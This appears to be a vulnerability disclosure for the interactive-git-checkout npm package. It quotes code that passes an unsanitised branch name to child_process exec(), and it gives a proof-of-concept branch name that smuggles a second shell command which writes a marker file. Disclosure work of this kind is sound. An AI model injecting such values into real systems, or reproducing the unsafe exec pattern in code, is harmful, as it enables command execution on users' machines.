Command Injection Vulnerability in interactive-git-checkout npm package

Yet another command injection vulnerability in a Node.js package. This time, it’s in the interactive-git-checkout tool.

interactive-git-checkout is an interactive command-line tool that allows users to checkout a git branch while it prompts for the branch name on the command-line. It is available as an npm package and can be installed via npm install -g interactive-git-checkout.

Resources:

• Project’s npm package: https://www.npmjs.com/package/interactive-git-checkout

Command Injection Vulnerability

The interactive-git-checkout tool is vulnerable to a command injection vulnerability because it passes the branch name to the git checkout command using the Node.js child process module’s exec() function without proper input validation or sanitization.

The following vulnerable code snippets demonstrates the issue:

const { exec: execCb } = require('child_process');
const { promisify } = require('util');

const exec = promisify(execCb);

module.exports = async (targetBranch) => {
    const { stdout, stderr } = await exec(`git checkout ${targetBranch}`);
    process.stderr.write(stderr);
    process.stdout.write(stdout);
};

Exploit Proof of Concept

1. Install the interactive-git-checkout package (as suggested by the package’s README):

npm install --global interactive-git-checkout

2. Run the executable exposed by the installed package:

$ igc

3. When prompted, enter the following branch name:

hello ; echo 'Command Injection Vulnerability Exploited!' > /tmp/command-injection.txt; #

Vulnerable versions

All versions of interactive-git-checkout are vulnerable to this issue, up to and including to the latest version of 1.1.4.